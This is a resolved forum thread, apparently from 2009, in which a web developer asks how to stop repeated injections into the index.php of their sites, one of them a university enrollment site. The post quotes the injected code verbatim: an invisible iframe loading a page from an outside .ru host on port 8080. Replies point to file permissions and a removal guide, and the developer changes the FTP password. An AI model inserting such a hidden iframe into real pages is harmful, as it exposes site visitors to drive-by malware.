[RESOLVED] Website Injection/Attack - [Please Help]
Good day all, please i urgently need help on this.
somebody somewhere is attacking my websites(websites designed by me), one of the website is for a University here in my country and exisitng and prospective students are currently registering online(2009/2010 session).
here is the attack; somehow, somebody is injecting the homepage source code of these websites(index.php) with a code such as this
Code:
<iframe src="http://u1a.ru:8080/index.php" width=169 height=187 style="visibility: hidden"></iframe>
and it is having a serious negative effect on the website, sometimes it renders the web page offline.
i have always removed the injection each time i come accros it, but how do i prevent this from happening again?
Thanks
Re: Website Injection/Attack - [Please Help]
Can you show us the source code of index.php (and any other files that are referenced by the 'include' statement)
Re: Website Injection/Attack - [Please Help]
there no files included, and the index.php file contains HTML markups only.
when i get back to my machine, i'll post the code...but if this helps, the code was inserted directly after the body tag.
all i did for now was change the ftp password(and i hope it helps my situtation).
Re: Website Injection/Attack - [Please Help]
It's mostly likely your file permissions that's allowing the Iframe to be inserted.
This might help you out
Code:
http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
Re: Website Injection/Attack - [Please Help]
ok, i'll check the link out, but meanwhile i changed the permission of the index.php file to 755(also changed the ftp password) and i hope it helps my situation
Re: Website Injection/Attack - [Please Help]
Quote:
Originally Posted by
Bopo
Code:
http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
Thanks a bunch for that link!, it cleared things up for me.
Re: [RESOLVED] Website Injection/Attack - [Please Help]
No problem, glad you got it sorted.